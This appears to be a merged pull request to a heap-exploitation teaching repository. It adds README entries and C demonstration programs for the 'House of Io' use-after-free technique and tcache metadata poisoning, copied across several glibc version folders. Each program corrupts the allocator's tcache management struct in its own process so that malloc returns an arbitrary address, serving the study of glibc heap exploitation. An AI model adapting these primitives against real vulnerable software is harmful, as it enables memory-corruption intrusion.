Merge pull request #210 from Liikt/house_of_io

Add the house of Io attack

Author: Kyle-Kyle

README.md

@@ -41,6 +41,8 @@ We came up with the idea during a hack meeting, and have implemented the followi
 | [decrypt_safe_linking.c](glibc_2.35/decrypt_safe_linking.c) | <a href="https://wargames.ret2.systems/level/how2heap_decrypt_safe_linking_2.34" title="Debug Technique In Browser">:arrow_forward:</a> | Decrypt the poisoned value in linked list to recover the actual pointer | >= 2.32 | | |
 | [safe_link_double_protect.c](glibc_2.36/safe_link_double_protect.c) | | Leakless bypass for PROTECT_PTR by protecting a pointer twice, allowing for arbitrary pointer linking in t-cache | >= 2.32 | | [37c3 Potluck - Tamagoyaki](https://github.com/UDPctf/CTF-challenges/tree/main/Potluck-CTF-2023/Tamagoyaki)|
 | [tcache_dup.c](obsolete/glibc_2.27/tcache_dup.c)(obsolete) | |  Tricking malloc into returning an already-allocated heap pointer by abusing the tcache freelist. | 2.26 - 2.28 | [patch](https://sourceware.org/git/?p=glibc.git;a=commit;h=bcdaad21d4635931d1bd3b54a7894276925d081d) | |
+| [tcache_metadata_poisoning.c](glibc_2.27/tcache_metadata_poisoning.c) | | Trick the tcache into providing arbitrary pointers by manipulating the tcache metadata struct | >= 2.26 | | |
+| [house_of_io.c](glibc_2.31/house_of_io.c) | | Tricking malloc into return a pointer to arbitrary memory by manipulating the tcache management struct by UAF in a free'd tcache chunk. | 2.31 - 2.33 | | |
 
 The GnuLibc is under constant development and several of the techniques above have let to consistency checks introduced in the malloc/free logic.
 Consequently, these checks regularly break some of the techniques and require adjustments to bypass them (if possible).

glibc_2.27/tcache_metadata_poisoning.c

@@ -0,0 +1,59 @@
+#include <assert.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+// Tcache metadata poisoning attack
+// ================================
+//
+// By controlling the metadata of the tcache an attacker can insert malicious
+// pointers into the tcache bins. This pointer then can be easily accessed by
+// allocating a chunk of the appropriate size.
+
+// By default there are 64 tcache bins
+#define TCACHE_BINS 64
+// The header of a heap chunk is 0x10 bytes in size
+#define HEADER_SIZE 0x10
+
+// This is the `tcache_perthread_struct` (or the tcache metadata)
+struct tcache_metadata {
+  char counts[TCACHE_BINS];
+  void *entries[TCACHE_BINS];
+};
+
+int main() {
+  // Disable buffering
+  setbuf(stdin, NULL);
+  setbuf(stdout, NULL);
+
+  uint64_t stack_target = 0x1337;
+
+  puts("This example demonstrates what an attacker can achieve by controlling\n"
+       "the metadata chunk of the tcache.\n");
+  puts("First we have to allocate a chunk to initialize the stack. This chunk\n"
+       "will also serve as the relative offset to calculate the base of the\n"
+       "metadata chunk.");
+  uint64_t *victim = malloc(0x10);
+  printf("Victim chunk is at: %p.\n\n", victim);
+
+  long metadata_size = sizeof(struct tcache_metadata);
+  printf("Next we have to calculate the base address of the metadata struct.\n"
+         "The metadata struct itself is %#lx bytes in size. Additionally we\n"
+         "have to subtract the header of the victim chunk (so an extra 0x10\n"
+         "bytes).\n",
+         sizeof(struct tcache_metadata));
+  struct tcache_metadata *metadata =
+      (struct tcache_metadata *)((long)victim - HEADER_SIZE - metadata_size);
+  printf("The tcache metadata is located at %p.\n\n", metadata);
+
+  puts("Now we manipulate the metadata struct and insert the target address\n"
+       "in a chunk. Here we choose the second tcache bin.\n");
+  metadata->counts[1] = 1;
+  metadata->entries[1] = &stack_target;
+
+  uint64_t *evil = malloc(0x20);
+  printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n"
+         "second tcache bin. The returned pointer is %p.\n",
+         evil);
+  assert(evil == &stack_target);
+}

glibc_2.31/house_of_io.c

@@ -0,0 +1,104 @@
+#include <assert.h>
+#include <malloc.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+// House of Io - Use after free Variant
+// ====================================
+//
+// Source: https://awaraucom.wordpress.com/2020/07/19/house-of-io-remastered/
+//
+// Tested on libc versions 2.31, 2.32 and 2.33.
+//
+// House of Io makes use of the fact, that when freeing a chunk into the tcache
+// the chunk will receive a pointer to the tcache management struct which has
+// been allocated beforehand. This pointer is the tcache->key entry of a free'd
+// tcache chunk. There are three different versions of this attack and all work
+// even with safe-link enabled, as the tcache-key pointer, and more importantly
+// the pointers in the tcache_perthread_struct, are not protected.
+//
+// House of Io only works in libc versions 2.29 - 2.33, because in these
+// versions the key of a tcache entry is the pointer to the tcache management
+// struct. This can allow an attacker to carry out a tcache_metadata_poisoning
+// attack.
+//
+// However the exploit primitives are very constrained as stated in the source.
+// Negative overflows are very rare and so is the needed order of specific frees
+// for the double free variant. This use after free is a bit more realistic.
+
+unsigned long global_var = 1;
+
+struct overlay {
+  uint64_t *next;
+  uint64_t *key;
+};
+
+struct tcache_perthread_struct {
+  uint16_t counts[64];
+  uint64_t entries[64];
+};
+
+int main() {
+  setbuf(stdin, NULL);
+  setbuf(stdout, NULL);
+
+  puts("In house of Io we make use of the fact, that a free'd tcache chunk\n"
+       "gets a pointer to the tcache management struct inserted at the\n"
+       "second slot.\n");
+
+  puts(
+      "This variant is the use-after-free variant and can be used, if the\n"
+      "free'd struct has a pointer at offset +0x08, which can be read from\n"
+      "and written to. This pointer will be the tcache->key entry of the\n"
+      "free'd chunk, which contains a pointer to the tcache management\n"
+      "struct. If we use that pointer we can manipulate the tcache management\n"
+      "struct into returning an arbitrary pointer.\n");
+
+  printf("Specifically we get a pointer to the `global_var` at %p returned to\n"
+         "us from malloc.\n\n",
+         &global_var);
+
+  puts("First we have to allocate a struct, that has a pointer at offset\n"
+       "+0x08.\n");
+  struct overlay *ptr = malloc(sizeof(struct overlay));
+
+  ptr->next = malloc(0x10);
+  ptr->key = malloc(0x10);
+
+  puts("Then we immedietly free that struct to get a pointer to the tcache\n"
+       "management struct.\n");
+  free(ptr);
+
+  printf("The tcache struct is located at %p.\n\n", ptr->key);
+  struct tcache_perthread_struct *management_struct =
+      (struct tcache_perthread_struct *)ptr->key;
+
+  puts(
+      "Now that we have a pointer to the management struct we can manipulate\n"
+      "its values. First we potentially have to increase the counter of the\n"
+      "first bin by to a number higher than zero, to make the tcache think we\n"
+      "free'd at least one chunk. In our case this is not necesarry because\n"
+      "the `overlay` struct fits in the first bin and we have free'd that\n"
+      "already. The firest member of the tcache_perthread_struct is the array\n"
+      "of counters. So by overwriting the first element of our pointer we set\n"
+      "the correct value in the array.\n");
+  management_struct->counts[0] = 1;
+
+  printf("Before we overwrite the pointer in the tcache bin, the bin contains\n"
+         "[ %p ]. This is the same as the free'd overlay struct which we\n"
+         "created at the start [ %p == %p ].\n\n",
+         management_struct->entries[0], management_struct->entries[0], ptr);
+  management_struct->entries[0] = (uint64_t)&global_var;
+  printf(
+      "After the write we have placed a pointer to the global variable into\n"
+      "the tcache [ %p ].\n\n",
+      management_struct->entries[0]);
+
+  puts("If we now allocate a new chunk from that tcache bin we get a pointer\n"
+       "to our target location.\n");
+  uint64_t *evil_chunk = malloc(0x10);
+
+  assert(evil_chunk == &global_var);
+  return 0;
+}

glibc_2.31/tcache_metadata_poisoning.c

@@ -0,0 +1,59 @@
+#include <assert.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+// Tcache metadata poisoning attack
+// ================================
+//
+// By controlling the metadata of the tcache an attacker can insert malicious
+// pointers into the tcache bins. This pointer then can be easily accessed by
+// allocating a chunk of the appropriate size.
+
+// By default there are 64 tcache bins
+#define TCACHE_BINS 64
+// The header of a heap chunk is 0x10 bytes in size
+#define HEADER_SIZE 0x10
+
+// This is the `tcache_perthread_struct` (or the tcache metadata)
+struct tcache_metadata {
+  uint16_t counts[TCACHE_BINS];
+  void *entries[TCACHE_BINS];
+};
+
+int main() {
+  // Disable buffering
+  setbuf(stdin, NULL);
+  setbuf(stdout, NULL);
+
+  uint64_t stack_target = 0x1337;
+
+  puts("This example demonstrates what an attacker can achieve by controlling\n"
+       "the metadata chunk of the tcache.\n");
+  puts("First we have to allocate a chunk to initialize the stack. This chunk\n"
+       "will also serve as the relative offset to calculate the base of the\n"
+       "metadata chunk.");
+  uint64_t *victim = malloc(0x10);
+  printf("Victim chunk is at: %p.\n\n", victim);
+
+  long metadata_size = sizeof(struct tcache_metadata);
+  printf("Next we have to calculate the base address of the metadata struct.\n"
+         "The metadata struct itself is %#lx bytes in size. Additionally we\n"
+         "have to subtract the header of the victim chunk (so an extra 0x10\n"
+         "bytes).\n",
+         sizeof(struct tcache_metadata));
+  struct tcache_metadata *metadata =
+      (struct tcache_metadata *)((long)victim - HEADER_SIZE - metadata_size);
+  printf("The tcache metadata is located at %p.\n\n", metadata);
+
+  puts("Now we manipulate the metadata struct and insert the target address\n"
+       "in a chunk. Here we choose the second tcache bin.\n");
+  metadata->counts[1] = 1;
+  metadata->entries[1] = &stack_target;
+
+  uint64_t *evil = malloc(0x20);
+  printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n"
+         "second tcache bin. The returned pointer is %p.\n",
+         evil);
+  assert(evil == &stack_target);
+}

glibc_2.32/house_of_io.c

@@ -0,0 +1,104 @@
+#include <assert.h>
+#include <malloc.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+// House of Io - Use after free Variant
+// ====================================
+//
+// Source: https://awaraucom.wordpress.com/2020/07/19/house-of-io-remastered/
+//
+// Tested on libc versions 2.31, 2.32 and 2.33.
+//
+// House of Io makes use of the fact, that when freeing a chunk into the tcache
+// the chunk will receive a pointer to the tcache management struct which has
+// been allocated beforehand. This pointer is the tcache->key entry of a free'd
+// tcache chunk. There are three different versions of this attack and all work
+// even with safe-link enabled, as the tcache-key pointer, and more importantly
+// the pointers in the tcache_perthread_struct, are not protected.
+//
+// House of Io only works in libc versions 2.29 - 2.33, because in these
+// versions the key of a tcache entry is the pointer to the tcache management
+// struct. This can allow an attacker to carry out a tcache_metadata_poisoning
+// attack.
+//
+// However the exploit primitives are very constrained as stated in the source.
+// Negative overflows are very rare and so is the needed order of specific frees
+// for the double free variant. This use after free is a bit more realistic.
+
+unsigned long global_var = 1;
+
+struct overlay {
+  uint64_t *next;
+  uint64_t *key;
+};
+
+struct tcache_perthread_struct {
+  uint16_t counts[64];
+  uint64_t entries[64];
+};
+
+int main() {
+  setbuf(stdin, NULL);
+  setbuf(stdout, NULL);
+
+  puts("In house of Io we make use of the fact, that a free'd tcache chunk\n"
+       "gets a pointer to the tcache management struct inserted at the\n"
+       "second slot.\n");
+
+  puts(
+      "This variant is the use-after-free variant and can be used, if the\n"
+      "free'd struct has a pointer at offset +0x08, which can be read from\n"
+      "and written to. This pointer will be the tcache->key entry of the\n"
+      "free'd chunk, which contains a pointer to the tcache management\n"
+      "struct. If we use that pointer we can manipulate the tcache management\n"
+      "struct into returning an arbitrary pointer.\n");
+
+  printf("Specifically we get a pointer to the `global_var` at %p returned to\n"
+         "us from malloc.\n\n",
+         &global_var);
+
+  puts("First we have to allocate a struct, that has a pointer at offset\n"
+       "+0x08.\n");
+  struct overlay *ptr = malloc(sizeof(struct overlay));
+
+  ptr->next = malloc(0x10);
+  ptr->key = malloc(0x10);
+
+  puts("Then we immedietly free that struct to get a pointer to the tcache\n"
+       "management struct.\n");
+  free(ptr);
+
+  printf("The tcache struct is located at %p.\n\n", ptr->key);
+  struct tcache_perthread_struct *management_struct =
+      (struct tcache_perthread_struct *)ptr->key;
+
+  puts(
+      "Now that we have a pointer to the management struct we can manipulate\n"
+      "its values. First we potentially have to increase the counter of the\n"
+      "first bin by to a number higher than zero, to make the tcache think we\n"
+      "free'd at least one chunk. In our case this is not necesarry because\n"
+      "the `overlay` struct fits in the first bin and we have free'd that\n"
+      "already. The firest member of the tcache_perthread_struct is the array\n"
+      "of counters. So by overwriting the first element of our pointer we set\n"
+      "the correct value in the array.\n");
+  management_struct->counts[0] = 1;
+
+  printf("Before we overwrite the pointer in the tcache bin, the bin contains\n"
+         "[ %p ]. This is the same as the free'd overlay struct which we\n"
+         "created at the start [ %p == %p ].\n\n",
+         management_struct->entries[0], management_struct->entries[0], ptr);
+  management_struct->entries[0] = (uint64_t)&global_var;
+  printf(
+      "After the write we have placed a pointer to the global variable into\n"
+      "the tcache [ %p ].\n\n",
+      management_struct->entries[0]);
+
+  puts("If we now allocate a new chunk from that tcache bin we get a pointer\n"
+       "to our target location.\n");
+  uint64_t *evil_chunk = malloc(0x10);
+
+  assert(evil_chunk == &global_var);
+  return 0;
+}

glibc_2.32/tcache_metadata_poisoning.c

@@ -0,0 +1,59 @@
+#include <assert.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+// Tcache metadata poisoning attack
+// ================================
+//
+// By controlling the metadata of the tcache an attacker can insert malicious
+// pointers into the tcache bins. This pointer then can be easily accessed by
+// allocating a chunk of the appropriate size.
+
+// By default there are 64 tcache bins
+#define TCACHE_BINS 64
+// The header of a heap chunk is 0x10 bytes in size
+#define HEADER_SIZE 0x10
+
+// This is the `tcache_perthread_struct` (or the tcache metadata)
+struct tcache_metadata {
+  uint16_t counts[TCACHE_BINS];
+  void *entries[TCACHE_BINS];
+};
+
+int main() {
+  // Disable buffering
+  setbuf(stdin, NULL);
+  setbuf(stdout, NULL);
+
+  uint64_t stack_target = 0x1337;
+
+  puts("This example demonstrates what an attacker can achieve by controlling\n"
+       "the metadata chunk of the tcache.\n");
+  puts("First we have to allocate a chunk to initialize the stack. This chunk\n"
+       "will also serve as the relative offset to calculate the base of the\n"
+       "metadata chunk.");
+  uint64_t *victim = malloc(0x10);
+  printf("Victim chunk is at: %p.\n\n", victim);
+
+  long metadata_size = sizeof(struct tcache_metadata);
+  printf("Next we have to calculate the base address of the metadata struct.\n"
+         "The metadata struct itself is %#lx bytes in size. Additionally we\n"
+         "have to subtract the header of the victim chunk (so an extra 0x10\n"
+         "bytes).\n",
+         sizeof(struct tcache_metadata));
+  struct tcache_metadata *metadata =
+      (struct tcache_metadata *)((long)victim - HEADER_SIZE - metadata_size);
+  printf("The tcache metadata is located at %p.\n\n", metadata);
+
+  puts("Now we manipulate the metadata struct and insert the target address\n"
+       "in a chunk. Here we choose the second tcache bin.\n");
+  metadata->counts[1] = 1;
+  metadata->entries[1] = &stack_target;
+
+  uint64_t *evil = malloc(0x20);
+  printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n"
+         "second tcache bin. The returned pointer is %p.\n",
+         evil);
+  assert(evil == &stack_target);
+}